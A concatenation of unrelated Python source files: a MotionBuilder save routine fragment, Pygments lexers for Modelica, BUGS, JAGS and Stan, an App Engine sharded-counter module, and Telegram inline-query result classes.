if not lMgr.SaveEnd():
moBuLogger.errorDialog('There is a problem saving the file', 'Cannot Save')
# 2012 save process
elif self.mobuVer == 2012 or self.mobuVer == 2013 or self.mobuVer == 2014:
alreadyExists = False
if Path(pathFile).exists():
alreadyExists = True
if not self.app.FileSave(str(pathFile), pOptions):
# cancelled?
moBuLogger.warning("Cancelled")
return False
if not alreadyExists:
# check to see if new file is there
res = os.path.exists(str(pathFile))
if res:
if not quiet:
moBuLogger.info("%s, '%s'" % (text, str(pathFile)))
return True
else:
moBuLogger.errorDialog("Failed to save '%s'" % str(pathFile))
return False
else:
#TODO: check to see if different?
if not quiet:
moBuLogger.info("%s, '%s'" % (text, str(pathFile)))
return True
mbFile = MoBuFile()
print "core.moBuFile imported"
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.modeling
~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for modeling languages.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups, using, default
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
from pygments.lexers.html import HtmlLexer
from pygments.lexers import _stan_builtins
__all__ = ['ModelicaLexer', 'BugsLexer', 'JagsLexer', 'StanLexer']
class ModelicaLexer(RegexLexer):
"""
For `Modelica <http://www.modelica.org/>`_ source code.
.. versionadded:: 1.1
"""
name = 'Modelica'
aliases = ['modelica']
filenames = ['*.mo']
mimetypes = ['text/x-modelica']
flags = re.DOTALL | re.MULTILINE
_name = r"(?:'(?:[^\\']|\\.)+'|[a-zA-Z_]\w*)"
tokens = {
'whitespace': [
(u'[\\s\ufeff]+', Text),
(r'//[^\n]*\n?', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline)
],
'root': [
include('whitespace'),
(r'"', String.Double, 'string'),
(r'[()\[\]{},;]+', Punctuation),
(r'\.?[*^/+-]|\.|<>|[<>:=]=?', Operator),
(r'\d+(\.?\d*[eE][-+]?\d+|\.\d*)', Number.Float),
(r'\d+', Number.Integer),
(r'(abs|acos|actualStream|array|asin|assert|AssertionLevel|atan|'
r'atan2|backSample|Boolean|cardinality|cat|ceil|change|Clock|'
r'Connections|cos|cosh|cross|delay|diagonal|div|edge|exp|'
r'ExternalObject|fill|floor|getInstanceName|hold|homotopy|'
r'identity|inStream|integer|Integer|interval|inverse|isPresent|'
r'linspace|log|log10|matrix|max|min|mod|ndims|noClock|noEvent|'
r'ones|outerProduct|pre|previous|product|Real|reinit|rem|rooted|'
r'sample|scalar|semiLinear|shiftSample|sign|sin|sinh|size|skew|'
r'smooth|spatialDistribution|sqrt|StateSelect|String|subSample|'
r'sum|superSample|symmetric|tan|tanh|terminal|terminate|time|'
r'transpose|vector|zeros)\b', Name.Builtin),
(r'(algorithm|annotation|break|connect|constant|constrainedby|der|'
r'discrete|each|else|elseif|elsewhen|encapsulated|enumeration|'
r'equation|exit|expandable|extends|external|final|flow|for|if|'
r'import|impure|in|initial|inner|input|loop|nondiscrete|outer|'
r'output|parameter|partial|protected|public|pure|redeclare|'
r'replaceable|return|stream|then|when|while)\b',
Keyword.Reserved),
(r'(and|not|or)\b', Operator.Word),
(r'(block|class|connector|end|function|model|operator|package|'
r'record|type)\b', Keyword.Reserved, 'class'),
(r'(false|true)\b', Keyword.Constant),
(r'within\b', Keyword.Reserved, 'package-prefix'),
(_name, Name)
],
'class': [
include('whitespace'),
(r'(function|record)\b', Keyword.Reserved),
(r'(if|for|when|while)\b', Keyword.Reserved, '#pop'),
(_name, Name.Class, '#pop'),
default('#pop')
],
'package-prefix': [
include('whitespace'),
(_name, Name.Namespace, '#pop'),
default('#pop')
],
'string': [
(r'"', String.Double, '#pop'),
(r'\\[\'"?\\abfnrtv]', String.Escape),
(r'(?i)<\s*html\s*>([^\\"]|\\.)+?(<\s*/\s*html\s*>|(?="))',
using(HtmlLexer)),
(r'<|\\?[^"\\<]+', String.Double)
]
}
class BugsLexer(RegexLexer):
"""
Pygments Lexer for `OpenBugs <http://www.openbugs.net/>`_ and WinBugs
models.
.. versionadded:: 1.6
"""
name = 'BUGS'
aliases = ['bugs', 'winbugs', 'openbugs']
filenames = ['*.bug']
_FUNCTIONS = (
# Scalar functions
'abs', 'arccos', 'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctanh',
'cloglog', 'cos', 'cosh', 'cumulative', 'cut', 'density', 'deviance',
'equals', 'expr', 'gammap', 'ilogit', 'icloglog', 'integral', 'log',
'logfact', 'loggam', 'logit', 'max', 'min', 'phi', 'post.p.value',
'pow', 'prior.p.value', 'probit', 'replicate.post', 'replicate.prior',
'round', 'sin', 'sinh', 'solution', 'sqrt', 'step', 'tan', 'tanh',
'trunc',
# Vector functions
'inprod', 'interp.lin', 'inverse', 'logdet', 'mean', 'eigen.vals',
'ode', 'prod', 'p.valueM', 'rank', 'ranked', 'replicate.postM',
'sd', 'sort', 'sum',
# Special
'D', 'I', 'F', 'T', 'C')
""" OpenBUGS built-in functions
From http://www.openbugs.info/Manuals/ModelSpecification.html#ContentsAII
This also includes
- T, C, I : Truncation and censoring.
``T`` and ``C`` are in OpenBUGS. ``I`` in WinBUGS.
- D : ODE
- F : Functional http://www.openbugs.info/Examples/Functionals.html
"""
_DISTRIBUTIONS = ('dbern', 'dbin', 'dcat', 'dnegbin', 'dpois',
'dhyper', 'dbeta', 'dchisqr', 'ddexp', 'dexp',
'dflat', 'dgamma', 'dgev', 'df', 'dggamma', 'dgpar',
'dloglik', 'dlnorm', 'dlogis', 'dnorm', 'dpar',
'dt', 'dunif', 'dweib', 'dmulti', 'ddirch', 'dmnorm',
'dmt', 'dwish')
""" OpenBUGS built-in distributions
Functions from
http://www.openbugs.info/Manuals/ModelSpecification.html#ContentsAI
"""
tokens = {
'whitespace': [
(r"\s+", Text),
],
'comments': [
# Comments
(r'#.*$', Comment.Single),
],
'root': [
# Comments
include('comments'),
include('whitespace'),
# Block start
(r'(model)(\s+)(\{)',
bygroups(Keyword.Namespace, Text, Punctuation)),
# Reserved Words
(r'(for|in)(?![\w.])', Keyword.Reserved),
# Built-in Functions
(r'(%s)(?=\s*\()'
% r'|'.join(_FUNCTIONS + _DISTRIBUTIONS),
Name.Builtin),
# Regular variable names
(r'[A-Za-z][\w.]*', Name),
# Number Literals
(r'[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?', Number),
# Punctuation
(r'\[|\]|\(|\)|:|,|;', Punctuation),
# Assignment operators
# SLexer makes these tokens Operators.
(r'<-|~', Operator),
# Infix and prefix operators
(r'\+|-|\*|/', Operator),
# Block
(r'[{}]', Punctuation),
]
}
def analyse_text(text):
if re.search(r"^\s*model\s*{", text, re.M):
return 0.7
else:
return 0.0
class JagsLexer(RegexLexer):
"""
Pygments Lexer for JAGS.
.. versionadded:: 1.6
"""
name = 'JAGS'
aliases = ['jags']
filenames = ['*.jag', '*.bug']
# JAGS
_FUNCTIONS = (
'abs', 'arccos', 'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctanh',
'cos', 'cosh', 'cloglog',
'equals', 'exp', 'icloglog', 'ifelse', 'ilogit', 'log', 'logfact',
'loggam', 'logit', 'phi', 'pow', 'probit', 'round', 'sin', 'sinh',
'sqrt', 'step', 'tan', 'tanh', 'trunc', 'inprod', 'interp.lin',
'logdet', 'max', 'mean', 'min', 'prod', 'sum', 'sd', 'inverse',
'rank', 'sort', 't', 'acos', 'acosh', 'asin', 'asinh', 'atan',
# Truncation/Censoring (should I include)
'T', 'I')
# Distributions with density, probability and quartile functions
_DISTRIBUTIONS = tuple('[dpq]%s' % x for x in
('bern', 'beta', 'dchiqsqr', 'ddexp', 'dexp',
'df', 'gamma', 'gen.gamma', 'logis', 'lnorm',
'negbin', 'nchisqr', 'norm', 'par', 'pois', 'weib'))
# Other distributions without density and probability
_OTHER_DISTRIBUTIONS = (
'dt', 'dunif', 'dbetabin', 'dbern', 'dbin', 'dcat', 'dhyper',
'ddirch', 'dmnorm', 'dwish', 'dmt', 'dmulti', 'dbinom', 'dchisq',
'dnbinom', 'dweibull', 'ddirich')
tokens = {
'whitespace': [
(r"\s+", Text),
],
'names': [
# Regular variable names
(r'[a-zA-Z][\w.]*\b', Name),
],
'comments': [
# do not use stateful comments
(r'(?s)/\*.*?\*/', Comment.Multiline),
# Comments
(r'#.*$', Comment.Single),
],
'root': [
# Comments
include('comments'),
include('whitespace'),
# Block start
(r'(model|data)(\s+)(\{)',
bygroups(Keyword.Namespace, Text, Punctuation)),
(r'var(?![\w.])', Keyword.Declaration),
# Reserved Words
(r'(for|in)(?![\w.])', Keyword.Reserved),
# Builtins
# Need to use lookahead because . is a valid char
(r'(%s)(?=\s*\()' % r'|'.join(_FUNCTIONS
+ _DISTRIBUTIONS
+ _OTHER_DISTRIBUTIONS),
Name.Builtin),
# Names
include('names'),
# Number Literals
(r'[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?', Number),
(r'\[|\]|\(|\)|:|,|;', Punctuation),
# Assignment operators
(r'<-|~', Operator),
# # JAGS includes many more than OpenBUGS
(r'\+|-|\*|\/|\|\|[&]{2}|[<>=]=?|\^|%.*?%', Operator),
(r'[{}]', Punctuation),
]
}
def analyse_text(text):
if re.search(r'^\s*model\s*\{', text, re.M):
if re.search(r'^\s*data\s*\{', text, re.M):
return 0.9
elif re.search(r'^\s*var', text, re.M):
return 0.9
else:
return 0.3
else:
return 0
class StanLexer(RegexLexer):
"""Pygments Lexer for Stan models.
The Stan modeling language is specified in the *Stan Modeling Language
User's Guide and Reference Manual, v2.4.0*,
`pdf <https://github.com/stan-dev/stan/releases/download/v2.4.0/stan-reference-2.4.0.pdf>`__.
.. versionadded:: 1.6
"""
name = 'Stan'
aliases = ['stan']
filenames = ['*.stan']
tokens = {
'whitespace': [
(r"\s+", Text),
],
'comments': [
(r'(?s)/\*.*?\*/', Comment.Multiline),
# Comments
(r'(//|#).*$', Comment.Single),
],
'root': [
# Stan is more restrictive on strings than this regex
(r'"[^"]*"', String),
# Comments
include('comments'),
# block start
include('whitespace'),
# Block start
(r'(%s)(\s*)(\{)' %
r'|'.join(('functions', 'data', r'transformed\s+?data',
'parameters', r'transformed\s+parameters',
'model', r'generated\s+quantities')),
bygroups(Keyword.Namespace, Text, Punctuation)),
# Reserved Words
(r'(%s)\b' % r'|'.join(_stan_builtins.KEYWORDS), Keyword),
# Truncation
(r'T(?=\s*\[)', Keyword),
# Data types
(r'(%s)\b' % r'|'.join(_stan_builtins.TYPES), Keyword.Type),
# Punctuation
(r"[;:,\[\]()]", Punctuation),
# Builtin
(r'(%s)(?=\s*\()'
% r'|'.join(_stan_builtins.FUNCTIONS
+ _stan_builtins.DISTRIBUTIONS),
Name.Builtin),
# Special names ending in __, like lp__
(r'[A-Za-z]\w*__\b', Name.Builtin.Pseudo),
(r'(%s)\b' % r'|'.join(_stan_builtins.RESERVED), Keyword.Reserved),
# Regular variable names
(r'[A-Za-z]\w*\b', Name),
# Real Literals
(r'-?[0-9]+(\.[0-9]+)?[eE]-?[0-9]+', Number.Float),
(r'-?[0-9]*\.[0-9]*', Number.Float),
# Integer Literals
(r'-?[0-9]+', Number.Integer),
# Assignment operators
# SLexer makes these tokens Operators.
(r'<-|~', Operator),
# Infix, prefix and postfix operators (and = )
(r"\+|-|\.?\*|\.?/|\\|'|\^|==?|!=?|<=?|>=?|\|\||&&", Operator),
# Block delimiters
(r'[{}]', Punctuation),
]
}
def analyse_text(text):
if re.search(r'^\s*parameters\s*\{', text, re.M):
return 1.0
else:
return 0.0
|
|
"""
Copyright 2013 The Trustees of Princeton University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# borrowed from https://developers.google.com/appengine/articles/sharding_counters
import random
from google.appengine.api import memcache
from google.appengine.ext import ndb
import backends as backend
SHARD_KEY_TEMPLATE = 'shardcounter-{}-{:d}'
def _all_keys(name, num_shards):
"""Returns all possible keys for the counter name given the config.
Args:
name: The name of the counter.
Returns:
The full list of ndb.Key values corresponding to all the possible
counter shards that could exist.
"""
shard_key_strings = [SHARD_KEY_TEMPLATE.format(name, index) for index in range(num_shards)]
return [ndb.Key(GeneralCounterShard, shard_key_string) for shard_key_string in shard_key_strings]
class GeneralCounterShard(ndb.Model):
"""Shards for each named counter."""
count = ndb.IntegerProperty(default=0)
@ndb.tasklet
def _get_count_async(name, key_gen, use_memcache=True):
"""Retrieve the value for a given sharded counter.
Args:
name: The name of the counter.
num_shards: the number of shards
Returns:
Integer; the cumulative count of all sharded counters for the given
counter name.
"""
# only cache if it exists at all
do_cache = False
total = None
if use_memcache:
total = memcache.get(name)
if total is None:
total = 0
all_keys = key_gen()
counters = yield ndb.get_multi_async( all_keys, use_cache=False, use_memcache=False )
for counter in counters:
if counter is not None:
total += counter.count
do_cache = True
if do_cache and use_memcache:
memcache.set(name, total)
raise ndb.Return( total )
def get_count(name, num_shards, use_memcache=True):
count_fut = _get_count_async( name, lambda: _all_keys( name, num_shards ), use_memcache=use_memcache )
return count_fut.get_result()
def get_count_async(name, num_shards, use_memcache=True):
return _get_count_async( name, lambda: _all_keys(name, num_shards), use_memcache=use_memcache )
def count_from_futures( name, futs, do_cache=True ):
"""
Get the value of a counter from a list of futures returned from get_count_async
"""
count = 0
for f in futs:
count += f.get_result()
if do_cache:
memcache.set(name, count)
return count
def flush_cache(name):
"""
Flush the cache for this counter
"""
memcache.delete(name)
def increment(name, num_shards, delta=1, do_transaction=True, use_memcache=True):
"""
Increment the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
"""
return _change(name, num_shards, delta, do_transaction=True, use_memcache=use_memcache)
def decrement(name, num_shards, delta=-1, do_transaction=True, use_memcache=True ):
"""
Decrement the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
"""
return _change(name, num_shards, delta, do_transaction=True, use_memcache=use_memcache )
def delete(name, num_shards):
"""
Delete the named counter and all of its shards.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
"""
all_keys = _all_keys(name, num_shards)
ndb.delete_multi( all_keys )
memcache.delete( name )
return
def create(name, do_transaction=False ):
"""
create a named counter
"""
return _change(name, 1, 0, do_transaction=do_transaction )
def increment_async(name, num_shards, delta=1, do_transaction=True, use_memcache=True):
"""
Asynchronously increment the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
Return:
A future for the transaction
"""
return _change_async(name, num_shards, delta, do_transaction=do_transaction, use_memcache=use_memcache)
def decrement_async(name, num_shards, delta=-1, do_transaction=True, use_memcache=True):
"""
Asynchronously decrement the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
"""
return _change_async(name, num_shards, delta, do_transaction=do_transaction, use_memcache=use_memcache)
def delete_async(name, num_shards):
"""
Asynchronously delete the named counter and all of its shards.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
Return:
A list of Futures for each entity making up the counter.
"""
all_keys = _all_keys(name, num_shards)
delete_futs = ndb.delete_multi_async( all_keys )
memcache.delete( name )
return delete_futs
def create_async(name, do_transaction=False ):
"""
create a named counter, asynchronously
"""
return _change_async(name, 1, 0, do_transaction=do_transaction )
def _change_async(name, num_shards, value, do_transaction=True, use_memcache=True):
"""
Asynchronous transaction helper to increment the value for a given sharded counter.
Also takes a number of shards to determine which shard will be used.
Args:
name: The name of the counter.
num_shards: How many shards to use.
"""
@ndb.tasklet
def txn():
index = random.randint(0, num_shards - 1)
shard_key_string = SHARD_KEY_TEMPLATE.format(name, index)
counter = yield GeneralCounterShard.get_by_id_async(shard_key_string)
if counter is None:
counter = GeneralCounterShard(id=shard_key_string)
counter.count += value
yield counter.put_async()
if use_memcache:
if value > 0:
memcache.incr( name, delta=value )
elif value < 0:
memcache.decr( name, delta=-value )
else:
memcache.delete( name )
raise ndb.Return( True )
if do_transaction:
return ndb.transaction_async( txn )
else:
return txn()
def _change(name, num_shards, value, do_transaction=True, use_memcache=True ):
"""
Synchronous wrapper around _change_async
"""
tf = _change_async(name, num_shards, value, do_transaction=do_transaction, use_memcache=use_memcache)
tf.wait()
return tf.get_result()
|
|
"""inline module.
This module describes the Inline content to answer inlineQuery.
"""
from uuid import uuid4
from .content import DictItem
class _InlineQueryResult(DictItem):
"""Base class."""
_result_type = None
_prefix = None
def __init__(self, result_id=None, url=None, title=None, width=None,
height=None, thumb_url=None, thumb_width=None, caption=None,
thumb_height=None, file_id=None, description=None,
duration=None, mime_type=None, reply_markup=None,
input_message_content=None):
"""Initial instance.
:param result_id: Unique identifier for this result, 1-64 bytes.
:param url: URL of the result.
:param title: Title of the result.
:param width: Width of the result (photo, video, etc.).
:param height: Height of the result (photo, video, etc.).
:param thumb_url: URL of the thumbnail for the result.
:param thumb_width: Thumbnail width.
:param thumb_height: Thumbnail height.
:param caption: Caption of the result to be sent, 0-200 characters.
:param file_id: A valid file identifier of result cached.
:param description: Short description of the result.
:param duration: Duration in seconds.
:param mime_type: Mime type of the content.
:param reply_markup: Inline keyboard attached to the message.
:param input_message_content: Content of the message to be sent.
"""
self.id = result_id or uuid4().hex
self.title = title
self.thumb_url = thumb_url
self.thumb_width = thumb_width
self.thumb_height = thumb_height
self.description = description
self.caption = caption
self.mime_type = mime_type
self.reply_markup = reply_markup
self.input_message_content = input_message_content
self._prefix = self._prefix or self._result_type
for attr, value in zip(
('url', 'width', 'height', 'duration', 'file_id'),
(url, width, height, duration, file_id)
):
setattr(self, '%s_%s' % (self._prefix, attr), value)
def __str__(self):
return '{}(id:{})'.format(self.__class__.__name__, self.id)
@property
def result_type(self):
return self._result_type
def to_dict(self):
"""Represents an object as a dictionary."""
if self.input_message_content:
self.input_message_content = self.input_message_content.to_dict()
obj_dict = super(_InlineQueryResult, self).to_dict()
obj_dict['type'] = self._result_type
return obj_dict
class _InlineQueryResultImage(_InlineQueryResult):
"""Base constructor for image classes."""
def __init__(self, url, thumb_url, **kwargs):
super(_InlineQueryResultImage, self).__init__(
url=url, thumb_url=thumb_url, **kwargs
)
class _InlineQueryResultAudio(_InlineQueryResult):
"""Base constructor for audio classes."""
def __init__(self, url, title, **kwargs):
super(_InlineQueryResultAudio, self).__init__(
url=url, title=title, **kwargs
)
class _InlineQueryResultCached(_InlineQueryResult):
"""Base constructor for cached classes."""
def __init__(self, file_id, **kwargs):
super(_InlineQueryResultCached, self).__init__(
file_id=file_id, **kwargs
)
class _InlineQueryResultCachedTitle(_InlineQueryResult):
"""Base constructor for cached classes."""
def __init__(self, file_id, title, **kwargs):
super(_InlineQueryResultCachedTitle, self).__init__(
file_id=file_id, title=title, **kwargs
)
class InlineQueryResultPhoto(_InlineQueryResultImage):
"""Represents a link to a photo. By default, this photo will be sent by the
user with optional caption. Alternatively, you can use
input_message_content to send a message with the specified content instead
of the photo.
"""
_result_type = 'photo'
class InlineQueryResultGif(_InlineQueryResultImage):
"""Represents a link to an animated GIF file. By default, this animated GIF
file will be sent by the user with optional caption. Alternatively, you can
use input_message_content to send a message with the specified content
instead of the animation.
:param gif_duration: Duration of the GIF.
:param kwargs: Keyword arguments for _InlineQueryResultImage.
"""
_result_type = 'gif'
def __init__(self, gif_duration=None, **kwargs):
super(InlineQueryResultGif, self).__init__(**kwargs)
self.gif_duration = gif_duration
class InlineQueryResultMpeg4Gif(_InlineQueryResultImage):
"""Represents a link to a video animation (H.264/MPEG-4 AVC video without
sound). By default, this animated MPEG-4 file will be sent by the user with
optional caption. Alternatively, you can use input_message_content to send
a message with the specified content instead of the animation.
:param mpeg4_duration: Video duration.
:param kwargs: Keyword arguments for _InlineQueryResultImage.
"""
_result_type = 'mpeg4_gif'
_prefix = 'mpeg4'
def __init__(self, mpeg4_duration=None, **kwargs):
super(InlineQueryResultMpeg4Gif, self).__init__(**kwargs)
self.mpeg4_duration = mpeg4_duration
class InlineQueryResultAudio(_InlineQueryResultAudio):
"""Represents a link to an mp3 audio file. By default, this audio file will
be sent by the user. Alternatively, you can use input_message_content to
send a message with the specified content instead of the audio.
"""
_result_type = 'audio'
class InlineQueryResultVoice(_InlineQueryResultAudio):
"""Represents a link to a voice recording in an .ogg container encoded with
OPUS. By default, this voice recording will be sent by the user.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the the voice message.
"""
_result_type = 'voice'
class InlineQueryResultArticle(_InlineQueryResult):
"""Represents a link to an article or web page."""
_result_type = 'article'
def __init__(self, title, input_message_content, hide_url=None, **kwargs):
"""Initial instance.
:param title: Title of the result.
:param input_message_content: Content of the message to be sent (
InputTextMessageContent, InputLocationMessageContent,
InputVenueMessageContent, InputContactMessageContent).
:param kwargs: url, description, thumb_url, thumb_width, thumb_height,
reply_markup.
"""
super(InlineQueryResultArticle, self).__init__(
title=title, input_message_content=input_message_content, **kwargs
)
self.hide_url = hide_url
class InlineQueryResultVideo(_InlineQueryResult):
"""Represents a link to a page containing an embedded video player or a
video file. By default, this video file will be sent by the user with an
optional caption. Alternatively, you can use input_message_content to send
a message with the specified content instead of the video.
"""
_result_type = 'video'
def __init__(self, url, thumb_url, title, mime_type, **kwargs):
"""Initial instance.
:param url: A valid URL for the embedded video player or video file.
:param thumb_url: URL of the thumbnail (jpeg only) for the video.
:param title: Title for the result.
:param mime_type: Mime type of the content of video url, 'text/html' or
'video/mp4'.
:param kwargs: caption, width. height, duration, description,
reply_markup, input_message_content.
"""
super(InlineQueryResultVideo, self).__init__(
url=url,
thumb_url=thumb_url,
title=title,
mime_type=mime_type,
**kwargs
)
class InlineQueryResultDocument(_InlineQueryResult):
"""Represents a link to a file. By default, this file will be sent by the
user with an optional caption. Alternatively, you can use
input_message_content to send a message with the specified content instead
of the file. Currently, only .PDF and .ZIP files can be sent using this
method.
"""
_result_type = 'document'
def __init__(self, url, title, mime_type, **kwargs):
"""Initial instance.
:param url: A valid URL for the file.
:param title: Title for the result.
:param mime_type: Mime type of the content of the file, either
'application/pdf' or 'application/zip'.
:param kwargs: thumb_url, thumb_width, thumb_height, description,
caption, reply_markup, input_message_content.
"""
super(InlineQueryResultDocument, self).__init__(
url=url, title=title, mime_type=mime_type, **kwargs
)
class InlineQueryResultLocation(_InlineQueryResult):
"""Represents a location on a map. By default, the location will be sent by
the user. Alternatively, you can use input_message_content to send a
message with the specified content instead of the location.
"""
_result_type = 'location'
def __init__(self, latitude, longitude, title, **kwargs):
"""Initial instance.
:param latitude: Location latitude in degrees.
:param longitude: Location longitude in degrees.
:param title: Location title.
:param kwargs: thumb_url, thumb_width, thumb_height, reply_markup,
input_message_content.
"""
super(InlineQueryResultLocation, self).__init__(title=title, **kwargs)
self.latitude = latitude
self.longitude = longitude
class InlineQueryResultVenue(InlineQueryResultLocation):
"""Represents a venue. By default, the venue will be sent by the user.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the venue.
"""
_result_type = 'venue'
def __init__(self, latitude, longitude, title, address, **kwargs):
"""Initial instance.
:param latitude: Latitude of the venue location in degrees.
:param longitude: Longitude of the venue location in degrees.
:param title: Title of the venue.
:param address: Address of the venue.
:param kwargs: thumb_url, thumb_width, thumb_height, foursquare_id,
reply_markup, input_message_content.
"""
super(InlineQueryResultVenue, self).__init__(
latitude=latitude, longitude=longitude, title=title, **kwargs
)
self.address = address
class InlineQueryResultContact(_InlineQueryResult):
"""Represents a contact with a phone number. By default, this contact will
be sent by the user. Alternatively, you can use input_message_content to
send a message with the specified content instead of the contact.
"""
_result_type = 'contact'
def __init__(self, phone_number, first_name, last_name=None, **kwargs):
"""Initial instance.
:param phone_number: Contact's phone number.
:param first_name: Contact's first name.
:param last_name: Contact's last name.
:param kwargs: thumb_url, thumb_width, thumb_height, reply_markup,
input_message_content.
"""
super(InlineQueryResultContact, self).__init__(**kwargs)
self.phone_number = phone_number
self.first_name = first_name
self.last_name = last_name
class InlineQueryResultGame(_InlineQueryResult):
"""Represents a Game."""
_result_type = 'game'
def __init__(self, game_short_name, **kwargs):
"""Initial instance.
:param game_short_name: Short name of the game.
:param kwargs: reply_markup.
"""
super(InlineQueryResultGame, self).__init__(**kwargs)
self.game_short_name = game_short_name
class InlineQueryResultCachedPhoto(_InlineQueryResultCached):
"""Represents a link to a photo stored on the Telegram servers. By default,
this photo will be sent by the user with an optional caption.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the photo.
"""
_result_type = InlineQueryResultPhoto.result_type
class InlineQueryResultCachedGif(_InlineQueryResultCached):
"""Represents a link to an animated GIF file stored on the Telegram
servers. By default, this animated GIF file will be sent by the user with
an optional caption. Alternatively, you can use input_message_content to
send a message with specified content instead of the animation.
"""
_result_type = InlineQueryResultGif.result_type
class InlineQueryResultCachedMpeg4Gif(_InlineQueryResultCached):
"""Represents a link to a video animation (H.264/MPEG-4 AVC video without
sound) stored on the Telegram servers. By default, this animated MPEG-4
file will be sent by the user with an optional caption. Alternatively, you
can use input_message_content to send a message with the specified content
instead of the animation.
"""
_result_type = InlineQueryResultMpeg4Gif.result_type
class InlineQueryResultCachedSticker(_InlineQueryResultCached):
"""Represents a link to a sticker stored on the Telegram servers. By
default, this sticker will be sent by the user. Alternatively, you can use
input_message_content to send a message with the specified content instead
of the sticker.
"""
_result_type = 'sticker'
class InlineQueryResultCachedAudio(_InlineQueryResultCached):
"""Represents a link to an mp3 audio file stored on the Telegram servers.
By default, this audio file will be sent by the user. Alternatively, you
can use input_message_content to send a message with the specified content
instead of the audio.
"""
_result_type = InlineQueryResultAudio.result_type
class InlineQueryResultCachedDocument(_InlineQueryResultCachedTitle):
"""Represents a link to a file stored on the Telegram servers. By default,
this file will be sent by the user with an optional caption. Alternatively,
you can use input_message_content to send a message with the specified
content instead of the file.
"""
_result_type = InlineQueryResultDocument.result_type
class InlineQueryResultCachedVideo(_InlineQueryResultCachedTitle):
"""Represents a link to a video file stored on the Telegram servers. By
default, this video file will be sent by the user with an optional caption.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the video.
"""
_result_type = InlineQueryResultVideo.result_type
class InlineQueryResultCachedVoice(_InlineQueryResultCachedTitle):
"""Represents a link to a voice message stored on the Telegram servers. By
default, this voice message will be sent by the user. Alternatively, you
can use input_message_content to send a message with the specified content
instead of the voice message.
"""
_result_type = InlineQueryResultVoice.result_type
class InputTextMessageContent(DictItem):
"""Represents the content of a text message to be sent as the result of an
inline query.
"""
def __init__(self, message_text, parse_mode=None,
disable_web_page_preview=None):
"""Initial instance.
:param message_text: Text of the message to be sent, 1-4096 characters.
:param parse_mode: Send Markdown or HTML, if you want Telegram apps to
show bold, italic, fixed-width text or inline URLs in your bot's
message.
:param disable_web_page_preview: Disables link previews for links in
the sent message.
"""
self.message_text = message_text
self.parse_mode = parse_mode
self.disable_web_page_preview = disable_web_page_preview
class InputLocationMessageContent(DictItem):
"""Represents the content of a location message to be sent as the result of
an inline query.
"""
def __init__(self, latitude, longitude):
"""Initial instance.
:param latitude: Latitude of the location in degrees.
:param longitude: Longitude of the location in degrees.
"""
self.latitude = latitude
self.longitude = longitude
class InputVenueMessageContent(InputLocationMessageContent):
"""Represents the content of a venue message to be sent as the result of an
inline query.
"""
def __init__(self, latitude, longitude, title, address,
foursquare_id=None):
"""Initial instance.
:param latitude: Latitude of the venue in degrees.
:param longitude: Longitude of the venue in degrees.
:param title: Name of the venue.
:param address: Address of the venue.
:param foursquare_id: Foursquare identifier of the venue, if known.
"""
super(InputVenueMessageContent, self).__init__(latitude, longitude)
self.title = title
self.address = address
self.foursquare_id = foursquare_id
class InputContactMessageContent(DictItem):
"""Represents the content of a contact message to be sent as the result of
an inline query.
"""
def __init__(self, phone_number, first_name, last_name=None):
"""Initial instance.
:param phone_number: Contact's phone number.
:param first_name: Contact's first name.
:param last_name: Contact's last name.
"""
self.phone_number = phone_number
self.first_name = first_name
self.last_name = last_name
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.